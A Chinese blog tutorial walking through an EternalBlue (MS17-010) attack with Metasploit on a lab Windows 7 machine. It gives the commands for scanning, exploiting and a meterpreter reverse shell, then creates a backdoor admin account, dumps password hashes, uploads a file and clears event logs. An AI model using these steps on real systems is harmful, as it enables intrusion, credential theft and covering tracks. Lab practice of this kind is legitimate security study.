攻下windows7第二天——永恒之蓝(MS017-010)漏洞

最新推荐文章于 2024-04-10 17:35:19 发布
最新推荐文章于 2024-04-10 17:35:19 发布
阅读量4.3k 收藏 24
点赞数 4
分类专栏: 渗透 文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ploto_cs/article/details/108904845
版权

攻下windows7第二天——永恒之蓝(MS017-010)漏洞

一、永恒之蓝介绍

永恒之蓝是在Windows的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码。通过永恒之蓝漏洞会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

二、metasploit工具介绍

metasploit 是一个开源框架,这个框架用来做渗透测试,其 msf 是由多个不同的模块组成的,在使用方面的话,可以在 kali 中直接使用,命令行 msfconsole 即可
模块介绍:辅助模块(auxiliary)、渗透攻击模块(exploits)、后渗透攻击模块(post)、攻击载荷模块(payloads)、空指令模块(nops)、编码器模块(encoders),其中msf为总模块,其他均为分支模块

三、实验环境

攻击机kali :192.168.126.129
靶机 win7:192.168.126.134
注:win7 需要关闭防火墙以及未打永恒之蓝补丁

四、漏洞利用

1.启动软件

命令:msfconsole

在这里插入图片描述
在这里插入图片描述

2.在进行攻击利用之前,首先确实目标是否开放445端口,该漏洞Ms17-010是否存在,先做好简单的信息收集更能成功利用目标主机。

(1)利用msf的auxiliary模块进行漏洞验证

命令:search ms17-010
在这里插入图片描述

搜索有关漏洞的模块,结果看到很多有关该漏洞的不同模块,可以使用
auxiliary/scanner/smb/smb_ms17_010这个模块进行验证

(2)利用模块
命令:

use auxiliary/scanner/smb/smb_ms17_010

(3)配置模块
命令:show options(options)
在这里插入图片描述

对yes的选项进行配置
命令:set rhost 192.168.126.134
命令:set rport 445
在这里插入图片描述

(4)配置好后,探测一下查看结果存在该漏洞
命令:run
在这里插入图片描述

(5)也可以使用nmap探测主机详细信息
命令:nmap -sV 192.168.202.131(不在msf5下输入)
在这里插入图片描述

3.验证存在漏洞之后,就可以利用永恒之蓝漏洞,使用其中的渗透攻击(exploit)模块,对其进行渗透攻击
(1)选择模块
命令:use exploit/windows/smb/ms17_010_eternalblue
在这里插入图片描述

(2)配置模块
命令:options
在这里插入图片描述

命令:set rhost 192.168.126.134
命令:set rport 445
在这里插入图片描述

(3)配置完成,发动攻击
命令:run
在这里插入图片描述
在这里插入图片描述
显示转到C:\Windows\system32目录下,说明已经获得了shell的控制权。
① 进行后门植入(创建新的管理员账户)

 net user hack 123456 /add

//在windows 7上创建一个hack的用户,以便下次访问

 net localgroup administrators hack /add

//将hack加入到windows 7的本地管理员组中,以便获得更大权限
② 其他

net user

//查看windows 7本地用户

net localgroup administrators

//查看windows 7本地管理员

(4)可以使用meterpreter
meterpreter是metasploit框架中的一个扩展模块,作为溢出成功后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个meterpreter shell的链接。
meterpreter shell作为渗透模块有很多有用的功能,比如:添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等信息。另外meterpreter能够躲避入侵检测系统。在远程主机上隐藏自己,它不改变系统硬盘中的文件,因此HIDS(基于主机的入侵检测系统) 很难对它做出响应。此外它在运行的时候系统时间是变化的,所以跟踪它或者终止它对于一个有经验的人也会变得非常困难。

命令:set payload windows/x64/meterpreter/reverse_tcp
在这里插入图片描述
在这里插入图片描述

run
在这里插入图片描述
在这里插入图片描述

从上面看出已经攻入成功,可以输入:
① sysinfo查看系统信息

meterpreter > sysinfo

在这里插入图片描述

② 反弹shell
meterpreter >shell
在这里插入图片描述

③ 获得用户密码
密码为hash加密值,可以利用在线解密进行破解
meterpreter > hashdump
在这里插入图片描述

④ 捕捉屏幕:
meterpreter > screenhot
在这里插入图片描述

Win7
在这里插入图片描述

到kali root/这个路径下查看,可以看到返回的图片
在这里插入图片描述

⑤ 上传文件
“upload”命令为上传文件到靶机下测试上传了一个hack.exe文件到,可以直接执行
在这里插入图片描述

⑥ 清除事件日志
执行“clearev”命令,将清除事件日志。
在这里插入图片描述

其他命令详解: http://blog.sina.com.cn/s/blog_4c86552f0102wll1.html
https://www.cnblogs.com/backlion/p/9484949.html

网络信息安全-ploto

ploto_cs
关注
  • 4
    点赞
  • 24
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
metasploit学习之路(四)记一次实战--永恒之蓝(MS017-010)
Sea_Sand息禅
07-13 2168
本次为绝对的实战,并不是本人自己构造环境实验的,而且本来也没想到是有永恒之蓝漏洞永恒之蓝这个漏洞我没有复现过,但是这一次偶然的机会玩了一把。 大佬在讲台上面传授经验,用的是windows server 2003,于是我偷偷玩了一把,下面说下流程。 1、首先nmap扫描: msf5 > nmap -sS -sV -A -O -v 10.1.2.217 [*] exec: nmap -sS...
kali入侵win7.txt
07-23
整合了网络众多教程,容易出错处写的较详细,便于新手测试学习。
永恒之蓝(ms17-010)复现对win7与win server2008 R2渗透
最新发布
Lzcsfg的博客
04-10 1111
在虚拟机中安装关闭win7与win2008的防火墙,并正常有ip地址。本文对两种windows进行攻击测试,可以选用安装一个windows即可原理:永恒之蓝(EternalBlue)是一个由美国国家安全局(NSA)开发的网络攻击工具,它利用了Windows操作系统中的一个漏洞,该漏洞被标记为MS17-010。这个漏洞影响了微软的SMB协议(Server Message Block),该协议通常用于在本地网络中共享文件、打印机和其他资源。
Metaploit-永恒之蓝漏洞利用
weixin_30662011的博客
07-12 991
目录 Metaploit介绍 实验环境 漏洞利用过程 Metaploit介绍   本次测试主要是利用永恒之蓝漏洞windows7进行控制利用,掌握Metaploit工具的使用,知道永恒之蓝漏洞利用原理。永恒之蓝是在Windows的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码。通过永恒之蓝漏洞会扫描开放445文件共享端口...
永恒之蓝渗透失败
qq_59679474的博客
03-04 512
使用kali 中msfconsole模块“rhosts”对win7靶机进行渗透后失败,445端口拒绝连接。ps:kali和win7属于一个局域网内,win7系统为2009年纯净版版本,已关闭防火墙。ps:192.168.1.2为靶机ip。大神们我的问题出在哪了,求解答。
利用NSA的MS17-010漏洞利用工具实现Win 7和Win Server 2008系统入侵
weixin_34138521的博客
04-28 379
影子经纪人(Shadow Brokers)最近陆续曝光的NSA网络武器令人震惊,尽管这些工具是否出自国家级别黑客团队之手尚不清楚,但至少存在一个可以说明问题的事实:这些漏洞利用工具都能有效运行,且具有一定程度的威胁杀伤力。在此,我用NSA的两个大杀器演示对Win 7和Windows  Server 2008系统进行漏洞利用和入侵控制的过程复现。 复现工具说明 在需要用到两个比较有意思的工具,一个...
Metasploit入侵win7系统
weixin_45092418的博客
06-18 2244
Metasploit入侵win7系统一:实验环境二:获得信息a.获得网络拓扑图b.获得主机ip和目标ip三:实施入侵a.打开控制终端b.查找漏洞c.进行配置四:对主机进行操作五:做个守法的好青年 一:实验环境 主机:安装有Metasploit的kali linux 操作系统 目标:已关闭防火墙的win7系统 二:获得信息 a.获得网络拓扑图 画出网络拓扑图,确定你和目标主机在同一局域网下。 b.获得主机ip和目标ip 1.主机ip:ifconifg 这里的eth0是你有线连接的ip地址,也是lhost。
未知攻焉知防——XXE漏洞攻防.pdf
09-18
未知攻焉知防——XXE漏洞攻防 自动化 应急响应 云安全 网络信息安全 安全威胁
谷粒商城第二天-项目环境搭建
06-15
这就是common模块下面的src下的mian文件夹下的类
他山之石,可以攻御——谈谈一类没“技术”含量的绕过漏洞--宝宝树.pdf
05-22
他山之石,可以攻御——谈谈一类没“技术”含量的绕过漏洞--宝宝树.pdf
行业文档-设计装置-二轴往复斜式自动送料螺母攻牙机.zip
09-05
行业文档-设计装置-二轴往复斜式自动送料螺母攻牙机.zip
MS08-067漏洞 入侵Windows7
qq_34835962的博客
04-10 1679
kail利用msf工具对ms11-003漏洞入侵渗透Win7
qq_50854662的博客
05-26 1808
前言: windows7IE溢出攻击 实验环境: 工具:metasploit 靶机两台:windows 7和kali2020 攻击机IP地址:10.20.29.129 被攻击机IP地址:10.20.29.134 步骤: 1、在kali里面打开metasploit漏洞利用框架 2、搜索ms11-003漏洞利用模块 3、使用利用模块use exploit/windows/browser/ms11_003_ie_css_import 4、设置payload set pay...
使用MSF渗透攻击win7主机并远程执行命令
weixin_43991459的博客
06-15 3039
Win7 网络连接检查命令: Linux下: auxiliary是辅助模块用命令找寻关于ms17_010 的可运行模块用 指令,调用模块进行扫描,侦察靶机是否具备被攻击的条件通过 查看需要配置的参数,并用set进行配置,后面显示yes的必须设置若为【-】 以上说明已经打了改漏洞的补丁 刚才这个过程,是通过辅助模块探测目标主机的系统是否存在该漏洞。 下图的目标主机存在该漏洞 设置完成后出现【+】表示可以入侵 水印遮挡内容为: 开始加载使用入侵模块,进行入侵使用 指令查看可以使用的攻击载荷 若失败将靶机
对win7进行网络渗透
qq_57157540的博客
06-26 2247
1.ms原理:在已经安装的 Windows DNS 客户端处理链路本地多播名称解析查询方式中的一个缺陷可被利用来在 NetworkSer11-030 DNS 解析中的漏洞可能允许远程代码执行vice 帐户的上下文中执行任意代码。如果攻击者获得对网络的访问权限,然后创建自定义程序以向目标系统发送特制的 LLMNR 广播查询,则该漏洞可能允许远程执行代码。 2.渗透过程 设置参数 (payload,ip等) use exploit/windows/browser/ms11_003_ie_css_import
ms05-017漏洞原理与复现
weixin_34250434的博客
09-13 1192
漏洞描述 此漏洞由lds-pl.net漏洞研究组在2003年7月16日发现,漏洞及exp在网上公开后,网上出现了大量的×××实例,利用此漏洞的蠕虫也大量出现。 漏洞编号 CVE-2005-0059 OSVDB-15458 MSB-MS05-017 BID-13112 ×××目标 DCOM接口的服务器端 影响系统 Microsoft Windows XP Service Pack 1 ...
win7永恒之蓝
m0_58596609的博客
11-15 2138
一 使用msfconsole命令开启MSF,并使用search命令搜索永恒之蓝模块 search ms17-010 二 :使用搜索出来的第三个模块来进行探测目标是否存在永恒之蓝漏洞,并设置好以下参数进行扫描测试 >>>use auxiliary/scanner/smb/smb_ms17_010 /模块调用或者使用use 3对搜索出来的模块进行调用. >>>set rhost 192.168.202.131 //设置目标地址 >>&gt...
关于win7新系统不能永恒之蓝渗透和 Meterpreter出现stdapi_sys_power_exitwindows的一些小见解
qq_47077502的博客
04-11 1511
解决新win7不能永恒之蓝扫描和Meterpreter不能重启和关机的问题
application/vnd.ms-excel与application/octet-stream
09-03
这两个是常见的MIME类型(多用途互联网邮件扩展类型)。 application/vnd.ms-excel是Microsoft Excel电子表格文件的MIME类型。它用于表示Excel文件,可以包含数据、公式、图表和其他电子表格功能。 application/octet-stream是一种通用的二进制流文件的MIME类型。它表示任何不属于特定文件类型的二进制数据,例如未知格式的文件或未定义的二进制内容。 总结来说,application/vnd.ms-excel用于表示Excel文件,而application/octet-stream则是用于表示未知或未定义的二进制数据。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值